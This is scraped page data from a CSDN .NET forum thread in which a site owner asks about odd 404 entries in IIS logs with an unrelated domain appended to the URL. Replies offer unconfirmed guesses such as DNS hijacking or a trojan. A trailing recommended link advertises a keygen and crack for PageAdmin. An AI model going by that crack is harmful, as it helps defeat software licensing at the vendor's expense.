profile-avatar.csdnimg.cn\u002Fdefault.jpg!1","position":"","companyName":""},"user":{"userRole":3,"userName":null,"nickName":null,"avatarUrl":null,"rank":null,"follow":2,"communityBase":null,"joinCollege":null,"isVIP":null},"community":{"name":".NET社区","description":".NET技术交流专区","avatarUrl":"https:\u002F\u002Fimg-community.csdnimg.cn\u002Favatar\u002F745f64491f2744dcbce3cd7127270b93.png?x-oss-process=image\u002Fresize,m_fixed,h_88,w_88","qrCode":"","createTime":"2007-09-28","communityAvatarUrl":"https:\u002F\u002Fprofile-avatar.csdnimg.cn\u002Fdefault.jpg!1","communityNotice":null,"userCount":62046,"contentCount":669049,"followersCount":49817,"communityRule":"\u003Cp\u003E.NET 社区是一个围绕开源 .NET 的开放、热情、创新、包容的技术社区。社区致力于为广大 .NET 爱好者提供一个良好的知识共享、协同互助的 .NET 技术交流环境。我们尊重不同意见&#xff0c;支持健康理性的辩论和互动&#xff0c;反对歧视和攻击。\u003C\u002Fp\u003E\n\n\u003Cp\u003E希望和大家一起共同营造一个活跃、友好的社区氛围。\u003C\u002Fp\u003E\n","communityId":211,"bgImage":"","hashId":"2lwpzdnk","domain":"","uriName":"DotNET","externalDisplay":1,"adBanner":{"img":"","url":"","adType":0,"adCon":null},"rightBanner":{"img":"","url":"","adType":0,"adCon":null},"tagId":null,"tagName":null,"communityType":2,"communityApplyUrl":"https:\u002F\u002Fmarketing.csdn.net\u002Fquestions\u002FQ2106040308026533763","joinType":0,"visibleType":0,"collapse":0,"topicMoveAble":0,"allowActions":{},"communityOwner":"community_93","tagNameInfo":{"provinceTag":null,"areaTag":null,"technologyTags":[{"id":190,"name":"javascript"},{"id":400064,"name":"云原生"}],"customTags":[{"id":1,"name":"企业社区"}]}},"tabList":[{"tabId":862,"tabName":"问答","tabUrl":"https:\u002F\u002Fask.csdn.net\u002Flist\u002F3\u002Ftag\u002F576","tabSwitch":1,"tabType":0,"tabContribute":0,"indexOrder":0,"iframe":true,"sortType":1},{"tabId":20680,"tabName":".NET Conf China","tabUrl":"","tabSwitch":1,"tabType":1,"tabContribute":1,"cardType":0,"indexOrder":1,"url":"https:\u002F\u002Fbbs.csdn.net\u002Fforums\u002FDotNET?typeId=20680","iframe":false,"sortType":1},{"tabId":1370,"tabName":"全部","tabUrl":"","tabSwitch":1,"tabType":4,"tabContribute":0,"cardType":0,"indexOrder":2,"url":"https:\u002F\u002Fbbs.csdn.net\u002Fforums\u002FDotNET?typeId=1370","iframe":false,"sortType":1},{"tabId":420,"tabName":"招聘","tabUrl":"","tabSwitch":1,"tabType":3,"tabContribute":0,"indexOrder":3,"url":"https:\u002F\u002Fbbs.csdn.net\u002Fforums\u002FDotNET?typeId=420","iframe":false,"sortType":1},{"tabId":23493,"tabName":"社区公告","tabUrl":"","tabSwitch":1,"tabType":1,"tabContribute":1,"cardType":0,"indexOrder":3,"url":"https:\u002F\u002Fbbs.csdn.net\u002Fforums\u002FDotNET?typeId=23493","iframe":false,"sortType":1},{"tabId":22149,"tabName":"寻找 .NET 技术达人","tabUrl":"","tabSwitch":1,"tabType":1,"tabContribute":1,"cardType":0,"indexOrder":4,"url":"https:\u002F\u002Fbbs.csdn.net\u002Fforums\u002FDotNET?typeId=22149","iframe":false,"sortType":1},{"tabId":714,"tabName":".NET Framework","tabUrl":"","tabSwitch":1,"tabType":1,"tabContribute":1,"cardType":0,"indexOrder":5,"url":"https:\u002F\u002Fbbs.csdn.net\u002Fforums\u002FDotNET?typeId=714","iframe":false,"sortType":1},{"tabId":21249,"tabName":".NET Core","tabUrl":"","tabSwitch":1,"tabType":1,"tabContribute":1,"cardType":0,"indexOrder":6,"url":"https:\u002F\u002Fbbs.csdn.net\u002Fforums\u002FDotNET?typeId=21249","iframe":false,"sortType":1},{"tabId":21248,"tabName":"微服务","tabUrl":"","tabSwitch":1,"tabType":1,"tabContribute":1,"cardType":0,"indexOrder":7,"url":"https:\u002F\u002Fbbs.csdn.net\u002Fforums\u002FDotNET?typeId=21248","iframe":false,"sortType":1},{"tabId":21250,"tabName":".NET5 \u002F 6","tabUrl":"","tabSwitch":1,"tabType":1,"tabContribute":1,"cardType":0,"indexOrder":8,"url":"https:\u002F\u002Fbbs.csdn.net\u002Fforums\u002FDotNET?typeId=21250","iframe":false,"sortType":1},{"tabId":21498,"tabName":".NET技术前瞻","tabUrl":"","tabSwitch":1,"tabType":1,"tabContribute":1,"cardType":0,"indexOrder":9,"url":"https:\u002F\u002Fbbs.csdn.net\u002Fforums\u002FDotNET?typeId=21498","iframe":false,"sortType":1},{"tabId":21500,"tabName":"VC","tabUrl":"","tabSwitch":1,"tabType":1,"tabContribute":1,"cardType":0,"indexOrder":10,"url":"https:\u002F\u002Fbbs.csdn.net\u002Fforums\u002FDotNET?typeId=21500","iframe":false,"sortType":1},{"tabId":21499,"tabName":".NET技术其他语言","tabUrl":"","tabSwitch":1,"tabType":1,"tabContribute":1,"cardType":0,"indexOrder":11,"url":"https:\u002F\u002Fbbs.csdn.net\u002Fforums\u002FDotNET?typeId=21499","iframe":false,"sortType":1},{"tabId":21251,"tabName":"ASP_NET","tabUrl":"","tabSwitch":1,"tabType":1,"tabContribute":1,"cardType":0,"indexOrder":12,"url":"https:\u002F\u002Fbbs.csdn.net\u002Fforums\u002FDotNET?typeId=21251","iframe":false,"sortType":1},{"tabId":21253,"tabName":"EF","tabUrl":"","tabSwitch":1,"tabType":1,"tabContribute":1,"cardType":0,"indexOrder":13,"url":"https:\u002F\u002Fbbs.csdn.net\u002Fforums\u002FDotNET?typeId=21253","iframe":false,"sortType":1},{"tabId":21254,"tabName":"EF Core","tabUrl":"","tabSwitch":1,"tabType":1,"tabContribute":1,"cardType":0,"indexOrder":14,"url":"https:\u002F\u002Fbbs.csdn.net\u002Fforums\u002FDotNET?typeId=21254","iframe":false,"sortType":1},{"tabId":715,"tabName":"Web Services","tabUrl":"","tabSwitch":1,"tabType":1,"tabContribute":1,"cardType":0,"indexOrder":15,"url":"https:\u002F\u002Fbbs.csdn.net\u002Fforums\u002FDotNET?typeId=715","iframe":false,"sortType":1},{"tabId":717,"tabName":"桌面应用","tabUrl":"","tabSwitch":1,"tabType":1,"tabContribute":1,"cardType":0,"indexOrder":16,"url":"https:\u002F\u002Fbbs.csdn.net\u002Fforums\u002FDotNET?typeId=717","iframe":false,"sortType":1},{"tabId":716,"tabName":"VB","tabUrl":"","tabSwitch":1,"tabType":1,"tabContribute":1,"cardType":0,"indexOrder":17,"url":"https:\u002F\u002Fbbs.csdn.net\u002Fforums\u002FDotNET?typeId=716","iframe":false,"sortType":1},{"tabId":718,"tabName":"图表区","tabUrl":"","tabSwitch":1,"tabType":1,"tabContribute":1,"cardType":0,"indexOrder":18,"url":"https:\u002F\u002Fbbs.csdn.net\u002Fforums\u002FDotNET?typeId=718","iframe":false,"sortType":1},{"tabId":21258,"tabName":"前端","tabUrl":"","tabSwitch":1,"tabType":1,"tabContribute":1,"cardType":0,"indexOrder":19,"url":"https:\u002F\u002Fbbs.csdn.net\u002Fforums\u002FDotNET?typeId=21258","iframe":false,"sortType":1},{"tabId":4055689,"tabName":"博文收录","tabUrl":"","tabSwitch":1,"tabType":2,"tabContribute":0,"cardType":0,"indexOrder":19,"url":"https:\u002F\u002Fbbs.csdn.net\u002Fforums\u002FDotNET?typeId=4055689","iframe":false,"sortType":1},{"tabId":719,"tabName":"分析与设计","tabUrl":"","tabSwitch":1,"tabType":1,"tabContribute":1,"cardType":0,"indexOrder":20,"url":"https:\u002F\u002Fbbs.csdn.net\u002Fforums\u002FDotNET?typeId=719","iframe":false,"sortType":1},{"tabId":1638782,"tabName":"Ada助手","tabUrl":"","tabSwitch":1,"tabType":2,"tabContribute":0,"cardType":0,"indexOrder":20,"url":"https:\u002F\u002Fbbs.csdn.net\u002Fforums\u002FDotNET?typeId=1638782","iframe":false,"sortType":1},{"tabId":720,"tabName":"组件\u002F控件开发","tabUrl":"","tabSwitch":1,"tabType":1,"tabContribute":1,"cardType":0,"indexOrder":21,"url":"https:\u002F\u002Fbbs.csdn.net\u002Fforums\u002FDotNET?typeId=720","iframe":false,"sortType":1},{"tabId":721,"tabName":"AppLauncher","tabUrl":"","tabSwitch":1,"tabType":1,"tabContribute":1,"cardType":0,"indexOrder":22,"url":"https:\u002F\u002Fbbs.csdn.net\u002Fforums\u002FDotNET?typeId=721","iframe":false,"sortType":1},{"tabId":21252,"tabName":"圈内交友","tabUrl":"","tabSwitch":1,"tabType":1,"tabContribute":1,"cardType":0,"indexOrder":23,"url":"https:\u002F\u002Fbbs.csdn.net\u002Fforums\u002FDotNET?typeId=21252","iframe":false,"sortType":1}],"dataResource":{"mediaType":"c_cloud","subResourceType":"8_c_cloud_long_text","showType":"long_text","tabId":0,"communityName":".NET社区","communityHomePageUrl":"https:\u002F\u002Fbbs.csdn.net\u002Fforums\u002FDotNET","communityType":2,"content":{"id":"280041857","contentId":280041857,"cateId":0,"cateName":null,"url":"https:\u002F\u002Fbbs.csdn.net\u002Ftopics\u002F280041857","shareUrl":"https:\u002F\u002Fbbs.csdn.net\u002Ftopics\u002F280041857","createTime":"2008-11-03 02:32:42","updateTime":"2021-05-28 17:14:37","resourceUsername":"startray","best":0,"top":0,"text":null,"publishDate":"2008-11-03","lastReplyDate":"2008-11-07","type":"13","nickname":"startray","avatar":"https:\u002F\u002Fprofile-avatar.csdnimg.cn\u002F8eb2a7405e904edeb7327427931c7d37_startray.jpg!1","username":"startray","commentCount":16,"diggNum":0,"digg":false,"viewCount":132,"hit":false,"resourceSource":6,"status":10,"taskStatus":null,"expired":false,"taskCate":0,"taskAward":0,"taskExpired":null,"checkRedPacket":null,"avgScore":0,"totalScore":0,"topicTitle":"关于url后跟一个陌生的域名的问题","insertFirst":false,"likeInfo":null,"description":"我有一个网站,在目录devl下有一个文件,经常访问它 http:\u002F\u002Fwww.xxxx.com\u002Fdevl\u002Fa.aspx?a=1&b=2 这样的. 但我今天检查日志发现在IISlog日志中有这样的一个访问记录:报404错误. http:\u002F\u002Fwww.xxxx.com\u002Fdevl\u002Fwww.hao58.cn 后面这个www.hao58.cn这样网站与我的url没关系.我也不知道怎么会出现这样的呢?这是什么意思?怎么出现这样的访问?在IIS日志里还不少这样的. 谢谢各位.","coverImg":"https:\u002F\u002Fimg-home.csdnimg.cn\u002Fimages\u002F20221027055836.png","content":"我有一个网站&#xff0c;在目录devl下有一个文件&#xff0c;经常访问它 http:\u002F\u002Fwww.xxxx.com\u002Fdevl\u002Fa.aspx&#xff1f;a&#61;1&amp;b&#61;2 这样的&#xff0e;\u003Cbr \u002F\u003E\n但我今天检查日志发现在&#xff29;&#xff29;&#xff33;log日志中有这样的一个访问记录&#xff1a;报&#xff14;&#xff10;&#xff14;错误. http:\u002F\u002Fwww.xxxx.com\u002Fdevl\u002Fwww.hao58.cn 后面这个www.hao58.cn这样网站与我的url没关系&#xff0e;我也不知道怎么会出现这样的呢&#xff1f;这是什么意思&#xff1f;怎么出现这样的访问&#xff1f;在IIS日志里还不少这样的&#xff0e;\u003Cbr \u002F\u003E\n\u003Cbr \u002F\u003E\n\u003Cbr \u002F\u003E\n谢谢各位&#xff0e;","mdContent":null,"pictures":null,"videoInfo":null,"linkInfo":null,"student":{"isCertification":false,"org":"","bala":""},"employee":{"isCertification":false,"org":"","bala":""},"userCertification":[],"dependId":"0","dependSubType":null,"videoUrl":null,"favoriteCount":0,"favoriteStatus":false,"taskType":null,"defaultScore":null,"syncAsk":false,"videoPlayLength":null},"communityUser":null,"allowPost":false,"submitHistory":[{"user":{"registerurl":"https:\u002F\u002Fg.csdnimg.cn\u002Fstatic\u002Fuser-reg-year\u002F1x\u002F19.png","avatarurl":"https:\u002F\u002Fprofile-avatar.csdnimg.cn\u002F8eb2a7405e904edeb7327427931c7d37_startray.jpg!1","nickname":"startray","selfdesc":"","createdate":"2005-01-06 14:32:00","days":"7051","years":"19","username":"startray","school":null,"company":null,"job":null},"userName":"startray","event":"创建了帖子","body":"2008-11-03 02:32","editId":null}],"resourceExt":{}},"contentReply":{"pageNo":1,"pageSize":20,"totalPages":1,"totalCount":16,"total":0,"list":[{"hit":null,"hitMsg":null,"content":"up","topicTitle":null,"description":"up","id":241256465,"contentResourceId":280041857,"bindContentResourceId":0,"communityId":211,"username":"startray","userNickName":"startray","userAvatar":"https:\u002F\u002Fprofile-avatar.csdnimg.cn\u002F8eb2a7405e904edeb7327427931c7d37_startray.jpg!1","mdContent":null,"parentId":0,"replyName":"","replyNickName":"","bizNo":"bbs","ip":3689875090,"status":10,"childCount":0,"topStatus":0,"recommendStatus":0,"userLike":false,"diggCount":0,"childIds":"","createTime":"2008-11-07 11:39:38","updateTime":"2008-11-07 11:39:39","formatTime":"2008-11-07","userRoleHonorary":{"userName":null,"roleId":null,"roleType":null,"roleStatus":null,"honoraryId":null,"roleName":null,"honoraryName":null,"communityNickname":null,"communitySignature":null},"child":null,"communityNickname":null,"communityReplyNickname":null,"rewardInfo":null,"checkRedPacketVO":null,"noDiggCount":null},{"hit":null,"hitMsg":null,"content":"第一个不是程序错。并且我也不会response.redirect 到一个以前从来不知道的网站去\u003Cbr \u002F\u003E\n\u003Cbr \u002F\u003E\n\u003Cbr \u002F\u003E\n不同的网站&#xff0c;IP也是不同的。","topicTitle":null,"description":"第一个不是程序错。并且我也不会response.redirect 到一个以前从来不知道的网站去 不同的网站,IP也是不同的。","id":241199403,"contentResourceId":280041857,"bindContentResourceId":0,"communityId":211,"username":"startray","userNickName":"startray","userAvatar":"https:\u002F\u002Fprofile-avatar.csdnimg.cn\u002F8eb2a7405e904edeb7327427931c7d37_startray.jpg!1","mdContent":null,"parentId":0,"replyName":"","replyNickName":"","bizNo":"bbs","ip":3689875090,"status":10,"childCount":0,"topStatus":0,"recommendStatus":0,"userLike":false,"diggCount":0,"childIds":"","createTime":"2008-11-05 10:04:38","updateTime":"2008-11-05 10:04:38","formatTime":"2008-11-05","userRoleHonorary":{"userName":null,"roleId":null,"roleType":null,"roleStatus":null,"honoraryId":null,"roleName":null,"honoraryName":null,"communityNickname":null,"communitySignature":null},"child":null,"communityNickname":null,"communityReplyNickname":null,"rewardInfo":null,"checkRedPacketVO":null,"noDiggCount":null},{"hit":null,"hitMsg":null,"content":"也许与服务商的DNS劫持有关&#xff0c;后面跟的那个网站的地址&#xff0c;是不是经常变&#xff1f; 你把网址记下了&#xff0c;PING一下&#xff0c;看看是不是都是同一个地方的&#xff1f;","topicTitle":null,"description":"也许与服务商的DNS劫持有关,后面跟的那个网站的地址,是不是经常变? 你把网址记下了,PING一下,看看是不是都是同一个地方的?","id":241169168,"contentResourceId":280041857,"bindContentResourceId":0,"communityId":211,"username":"xiaoks668","userNickName":"xiaoks668","userAvatar":"https:\u002F\u002Fprofile-avatar.csdnimg.cn\u002Fdd8b280db0244ff5955f94bff2249192_xiaoks668.jpg!1","mdContent":null,"parentId":0,"replyName":"","replyNickName":"","bizNo":"bbs","ip":988832961,"status":10,"childCount":0,"topStatus":0,"recommendStatus":0,"userLike":false,"diggCount":0,"childIds":"","createTime":"2008-11-04 01:45:54","updateTime":"2008-11-04 01:45:53","formatTime":"2008-11-04","userRoleHonorary":{"userName":"xiaoks668","roleId":216,"roleType":0,"roleStatus":1,"honoraryId":0,"roleName":"","honoraryName":null,"communityNickname":"","communitySignature":""},"child":null,"communityNickname":null,"communityReplyNickname":null,"rewardInfo":null,"checkRedPacketVO":null,"noDiggCount":null},{"hit":null,"hitMsg":null,"content":"原因&#xff1a;程序有错误&#xff0c;被catch&#xff0c;然后response.redirect了。","topicTitle":null,"description":"原因:程序有错误,被catch,然后response.redirect了。","id":241179503,"contentResourceId":280041857,"bindContentResourceId":0,"communityId":211,"username":"rejoice123","userNickName":"Jack123","userAvatar":"https:\u002F\u002Fprofile-avatar.csdnimg.cn\u002Feadd5a71004b4fbca75cfb23075efe00_rejoice123.jpg!1","mdContent":null,"parentId":0,"replyName":"","replyNickName":"","bizNo":"bbs","ip":3722486010,"status":10,"childCount":0,"topStatus":0,"recommendStatus":0,"userLike":false,"diggCount":0,"childIds":"","createTime":"2008-11-04 01:11:15","updateTime":"2008-11-04 01:11:15","formatTime":"2008-11-04","userRoleHonorary":{"userName":"rejoice123","roleId":216,"roleType":0,"roleStatus":1,"honoraryId":0,"roleName":"","honoraryName":null,"communityNickname":"","communitySignature":""},"child":null,"communityNickname":null,"communityReplyNickname":null,"rewardInfo":null,"checkRedPacketVO":null,"noDiggCount":null},{"hit":null,"hitMsg":null,"content":"up","topicTitle":null,"description":"up","id":241161976,"contentResourceId":280041857,"bindContentResourceId":0,"communityId":211,"username":"startray","userNickName":"startray","userAvatar":"https:\u002F\u002Fprofile-avatar.csdnimg.cn\u002F8eb2a7405e904edeb7327427931c7d37_startray.jpg!1","mdContent":null,"parentId":0,"replyName":"","replyNickName":"","bizNo":"bbs","ip":3689875090,"status":10,"childCount":0,"topStatus":0,"recommendStatus":0,"userLike":false,"diggCount":0,"childIds":"","createTime":"2008-11-03 05:05:36","updateTime":"2008-11-03 05:05:35","formatTime":"2008-11-03","userRoleHonorary":{"userName":null,"roleId":null,"roleType":null,"roleStatus":null,"honoraryId":null,"roleName":null,"honoraryName":null,"communityNickname":null,"communitySignature":null},"child":null,"communityNickname":null,"communityReplyNickname":null,"rewardInfo":null,"checkRedPacketVO":null,"noDiggCount":null},{"hit":null,"hitMsg":null,"content":"up","topicTitle":null,"description":"up","id":241158987,"contentResourceId":280041857,"bindContentResourceId":0,"communityId":211,"username":"startray","userNickName":"startray","userAvatar":"https:\u002F\u002Fprofile-avatar.csdnimg.cn\u002F8eb2a7405e904edeb7327427931c7d37_startray.jpg!1","mdContent":null,"parentId":0,"replyName":"","replyNickName":"","bizNo":"bbs","ip":3689875090,"status":10,"childCount":0,"topStatus":0,"recommendStatus":0,"userLike":false,"diggCount":0,"childIds":"","createTime":"2008-11-03 03:33:07","updateTime":"2008-11-03 03:33:06","formatTime":"2008-11-03","userRoleHonorary":{"userName":null,"roleId":null,"roleType":null,"roleStatus":null,"honoraryId":null,"roleName":null,"honoraryName":null,"communityNickname":null,"communitySignature":null},"child":null,"communityNickname":null,"communityReplyNickname":null,"rewardInfo":null,"checkRedPacketVO":null,"noDiggCount":null},{"hit":null,"hitMsg":null,"content":"什么情况下会留有这种访问痕迹&#xff1f;\u003Cbr \u002F\u003E\n你们查过自已的网站没有&#xff0c;有没有发现过这样的事情&#xff1f;","topicTitle":null,"description":"什么情况下会留有这种访问痕迹? 你们查过自已的网站没有,有没有发现过这样的事情?","id":241158539,"contentResourceId":280041857,"bindContentResourceId":0,"communityId":211,"username":"startray","userNickName":"startray","userAvatar":"https:\u002F\u002Fprofile-avatar.csdnimg.cn\u002F8eb2a7405e904edeb7327427931c7d37_startray.jpg!1","mdContent":null,"parentId":0,"replyName":"","replyNickName":"","bizNo":"bbs","ip":3689875090,"status":10,"childCount":0,"topStatus":0,"recommendStatus":0,"userLike":false,"diggCount":0,"childIds":"","createTime":"2008-11-03 03:19:08","updateTime":"2008-11-03 03:19:07","formatTime":"2008-11-03","userRoleHonorary":{"userName":null,"roleId":null,"roleType":null,"roleStatus":null,"honoraryId":null,"roleName":null,"honoraryName":null,"communityNickname":null,"communitySignature":null},"child":null,"communityNickname":null,"communityReplyNickname":null,"rewardInfo":null,"checkRedPacketVO":null,"noDiggCount":null},{"hit":null,"hitMsg":null,"content":"............\u003Cbr \u002F\u003E\n不知&#xff0e;&#xff0e;&#xff0e;&#xff0e;&#xff0e;这是什么意思&#xff1f;有时有&#xff0c;有时没有","topicTitle":null,"description":"............ 不知.....这是什么意思?有时有,有时没有","id":241158501,"contentResourceId":280041857,"bindContentResourceId":0,"communityId":211,"username":"startray","userNickName":"startray","userAvatar":"https:\u002F\u002Fprofile-avatar.csdnimg.cn\u002F8eb2a7405e904edeb7327427931c7d37_startray.jpg!1","mdContent":null,"parentId":0,"replyName":"","replyNickName":"","bizNo":"bbs","ip":3689875090,"status":10,"childCount":0,"topStatus":0,"recommendStatus":0,"userLike":false,"diggCount":0,"childIds":"","createTime":"2008-11-03 03:18:04","updateTime":"2008-11-03 03:18:04","formatTime":"2008-11-03","userRoleHonorary":{"userName":null,"roleId":null,"roleType":null,"roleStatus":null,"honoraryId":null,"roleName":null,"honoraryName":null,"communityNickname":null,"communitySignature":null},"child":null,"communityNickname":null,"communityReplyNickname":null,"rewardInfo":null,"checkRedPacketVO":null,"noDiggCount":null},{"hit":null,"hitMsg":null,"content":"\u003Cbr \u002F\u003E\n\u003Cbr \u002F\u003E\n不太清楚\u003Cbr \u002F\u003E\n\u003Cbr \u002F\u003E\n是不是访问者留下的","topicTitle":null,"description":" 不太清楚 是不是访问者留下的","id":241158481,"contentResourceId":280041857,"bindContentResourceId":0,"communityId":211,"username":"hotit","userNickName":"hotit","userAvatar":"https:\u002F\u002Fprofile-avatar.csdnimg.cn\u002F85ab6d33589a4044baa7cc97634ca7ed_hotit.jpg!1","mdContent":null,"parentId":0,"replyName":"","replyNickName":"","bizNo":"bbs","ip":3524097602,"status":10,"childCount":0,"topStatus":0,"recommendStatus":0,"userLike":false,"diggCount":0,"childIds":"","createTime":"2008-11-03 03:17:35","updateTime":"2008-11-03 03:17:35","formatTime":"2008-11-03","userRoleHonorary":{"userName":"hotit","roleId":216,"roleType":0,"roleStatus":1,"honoraryId":0,"roleName":"","honoraryName":null,"communityNickname":"","communitySignature":""},"child":null,"communityNickname":null,"communityReplyNickname":null,"rewardInfo":null,"checkRedPacketVO":null,"noDiggCount":null},{"hit":null,"hitMsg":null,"content":"不会是中了木马吧?","topicTitle":null,"description":"不会是中了木马吧?","id":241158409,"contentResourceId":280041857,"bindContentResourceId":0,"communityId":211,"username":"gdf2627","userNickName":"gdf2627","userAvatar":"https:\u002F\u002Fprofile-avatar.csdnimg.cn\u002F01831c4edcc04232add767d970fd5f51_gdf2627.jpg!1","mdContent":null,"parentId":0,"replyName":"","replyNickName":"","bizNo":"bbs","ip":3546538196,"status":10,"childCount":0,"topStatus":0,"recommendStatus":0,"userLike":false,"diggCount":0,"childIds":"","createTime":"2008-11-03 03:15:14","updateTime":"2008-11-03 03:15:14","formatTime":"2008-11-03","userRoleHonorary":{"userName":"gdf2627","roleId":216,"roleType":0,"roleStatus":1,"honoraryId":0,"roleName":"","honoraryName":null,"communityNickname":"","communitySignature":""},"child":null,"communityNickname":null,"communityReplyNickname":null,"rewardInfo":null,"checkRedPacketVO":null,"noDiggCount":null},{"hit":null,"hitMsg":null,"content":"[Quote&#61;引用 3 楼 CloneCenter 的回复:]\u003Cbr \u002F\u003E\n这个是别人访问你的网站留下来的日志&#xff0c;你怎么能控制别人如何访问你呢&#xff1f;\u003Cbr \u002F\u003E\n[\u002FQuote]\u003Cbr \u002F\u003E\n\u003Cbr \u002F\u003E\n别人访问我的网站&#xff1f;不明白&#xff0e;那怎么会在我的url后面直接跟一个它的网站url呢&#xff1f;\u003Cbr \u002F\u003E\n我访问你的网站&#xff0c;也不可能留下我的网站吧&#xff1f;\u003Cbr \u002F\u003E\n例sohu访问sina&#xff0c;会留下&#xff1a;http:\u002F\u002Fwww.sina.com\u002F wwww.sohu.com 这样奇怪的访问url?并且iis还报了个404错&#xff0c;这明显是到我的服务器访问这样的一个url&#xff0c;没有然后报的错吧&#xff1f;","topicTitle":null,"description":"[Quote=引用 3 楼 CloneCenter 的回复:] 这个是别人访问你的网站留下来的日志,你怎么能控制别人如何访问你呢? [\u002FQuote] 别人访问我的网站?不明白.那怎么会在我的url后面直接跟一个它的网站url呢? 我访问你的网站,也不可能留下我的网站吧? 例sohu访问sina,会留下:http:\u002F\u002Fwww.sina.com\u002F wwww.sohu.com 这样奇怪的访问url?并且iis还报了个404错,这明显是到我的服务器访问这样的一个url,没有然后报的错吧?","id":241157910,"contentResourceId":280041857,"bindContentResourceId":0,"communityId":211,"username":"startray","userNickName":"startray","userAvatar":"https:\u002F\u002Fprofile-avatar.csdnimg.cn\u002F8eb2a7405e904edeb7327427931c7d37_startray.jpg!1","mdContent":null,"parentId":0,"replyName":"","replyNickName":"","bizNo":"bbs","ip":3689875090,"status":10,"childCount":0,"topStatus":0,"recommendStatus":0,"userLike":false,"diggCount":0,"childIds":"","createTime":"2008-11-03 03:01:28","updateTime":"2008-11-03 03:01:28","formatTime":"2008-11-03","userRoleHonorary":{"userName":null,"roleId":null,"roleType":null,"roleStatus":null,"honoraryId":null,"roleName":null,"honoraryName":null,"communityNickname":null,"communitySignature":null},"child":null,"communityNickname":null,"communityReplyNickname":null,"rewardInfo":null,"checkRedPacketVO":null,"noDiggCount":null},{"hit":null,"hitMsg":null,"content":"顶","topicTitle":null,"description":"顶","id":241157496,"contentResourceId":280041857,"bindContentResourceId":0,"communityId":211,"username":"hawaiiboys","userNickName":"hawaiiboys","userAvatar":"https:\u002F\u002Fprofile-avatar.csdnimg.cn\u002F2cff09a10a9e4d9f8e9dd03f0638530c_hawaiiboys.jpg!1","mdContent":null,"parentId":0,"replyName":"","replyNickName":"","bizNo":"bbs","ip":1947220176,"status":10,"childCount":0,"topStatus":0,"recommendStatus":0,"userLike":false,"diggCount":0,"childIds":"","createTime":"2008-11-03 02:49:19","updateTime":"2008-11-03 02:49:19","formatTime":"2008-11-03","userRoleHonorary":{"userName":null,"roleId":null,"roleType":null,"roleStatus":null,"honoraryId":null,"roleName":null,"honoraryName":null,"communityNickname":null,"communitySignature":null},"child":null,"communityNickname":null,"communityReplyNickname":null,"rewardInfo":null,"checkRedPacketVO":null,"noDiggCount":null},{"hit":null,"hitMsg":null,"content":"IIS Server 有其他程序。","topicTitle":null,"description":"IIS Server 有其他程序。","id":241157443,"contentResourceId":280041857,"bindContentResourceId":0,"communityId":211,"username":"rejoice123","userNickName":"Jack123","userAvatar":"https:\u002F\u002Fprofile-avatar.csdnimg.cn\u002Feadd5a71004b4fbca75cfb23075efe00_rejoice123.jpg!1","mdContent":null,"parentId":0,"replyName":"","replyNickName":"","bizNo":"bbs","ip":3722486010,"status":10,"childCount":0,"topStatus":0,"recommendStatus":0,"userLike":false,"diggCount":0,"childIds":"","createTime":"2008-11-03 02:48:12","updateTime":"2008-11-03 02:48:11","formatTime":"2008-11-03","userRoleHonorary":{"userName":"rejoice123","roleId":216,"roleType":0,"roleStatus":1,"honoraryId":0,"roleName":"","honoraryName":null,"communityNickname":"","communitySignature":""},"child":null,"communityNickname":null,"communityReplyNickname":null,"rewardInfo":null,"checkRedPacketVO":null,"noDiggCount":null},{"hit":null,"hitMsg":null,"content":"这个是别人访问你的网站留下来的日志&#xff0c;你怎么能控制别人如何访问你呢&#xff1f;","topicTitle":null,"description":"这个是别人访问你的网站留下来的日志,你怎么能控制别人如何访问你呢?","id":241157353,"contentResourceId":280041857,"bindContentResourceId":0,"communityId":211,"username":"CloneCenter","userNickName":"CloneCenter","userAvatar":"https:\u002F\u002Fprofile-avatar.csdnimg.cn\u002F2ce00c3075684650bfab0e318f0474ea_clonecenter.jpg!1","mdContent":null,"parentId":0,"replyName":"","replyNickName":"","bizNo":"bbs","ip":3658875026,"status":10,"childCount":0,"topStatus":0,"recommendStatus":0,"userLike":false,"diggCount":0,"childIds":"","createTime":"2008-11-03 02:45:42","updateTime":"2008-11-03 02:45:43","formatTime":"2008-11-03","userRoleHonorary":{"userName":null,"roleId":null,"roleType":null,"roleStatus":null,"honoraryId":null,"roleName":null,"honoraryName":null,"communityNickname":null,"communitySignature":null},"child":null,"communityNickname":null,"communityReplyNickname":null,"rewardInfo":null,"checkRedPacketVO":null,"noDiggCount":null},{"hit":null,"hitMsg":null,"content":"没有人帮忙解释一下吗&#xff1f;","topicTitle":null,"description":"没有人帮忙解释一下吗?","id":241157330,"contentResourceId":280041857,"bindContentResourceId":0,"communityId":211,"username":"startray","userNickName":"startray","userAvatar":"https:\u002F\u002Fprofile-avatar.csdnimg.cn\u002F8eb2a7405e904edeb7327427931c7d37_startray.jpg!1","mdContent":null,"parentId":0,"replyName":"","replyNickName":"","bizNo":"bbs","ip":3689875090,"status":10,"childCount":0,"topStatus":0,"recommendStatus":0,"userLike":false,"diggCount":0,"childIds":"","createTime":"2008-11-03 02:45:08","updateTime":"2008-11-03 02:45:07","formatTime":"2008-11-03","userRoleHonorary":{"userName":null,"roleId":null,"roleType":null,"roleStatus":null,"honoraryId":null,"roleName":null,"honoraryName":null,"communityNickname":null,"communitySignature":null},"child":null,"communityNickname":null,"communityReplyNickname":null,"rewardInfo":null,"checkRedPacketVO":null,"noDiggCount":null},{"hit":null,"hitMsg":null,"content":"up","topicTitle":null,"description":"up","id":241157077,"contentResourceId":280041857,"bindContentResourceId":0,"communityId":211,"username":"startray","userNickName":"startray","userAvatar":"https:\u002F\u002Fprofile-avatar.csdnimg.cn\u002F8eb2a7405e904edeb7327427931c7d37_startray.jpg!1","mdContent":null,"parentId":0,"replyName":"","replyNickName":"","bizNo":"bbs","ip":3689875090,"status":10,"childCount":0,"topStatus":0,"recommendStatus":0,"userLike":false,"diggCount":0,"childIds":"","createTime":"2008-11-03 02:37:39","updateTime":"2008-11-03 02:37:38","formatTime":"2008-11-03","userRoleHonorary":{"userName":null,"roleId":null,"roleType":null,"roleStatus":null,"honoraryId":null,"roleName":null,"honoraryName":null,"communityNickname":null,"communitySignature":null},"child":null,"communityNickname":null,"communityReplyNickname":null,"rewardInfo":null,"checkRedPacketVO":null,"noDiggCount":null}],"maxPageSize":3000},"defaultActiveTab":20680,"recommends":[{"url":"https:\u002F\u002Fdownload.csdn.net\u002Fdownload\u002Fu013791234\u002F6964385","title":"PageAdmin V3.0.20140208注册码 注册机 破解 去版权","desc":"注册码适用于 pageadmin网站管理系统 v3.0 build20140123、build20140208 原版程序\n\nlocalhost注册码:\n复制以下两行到 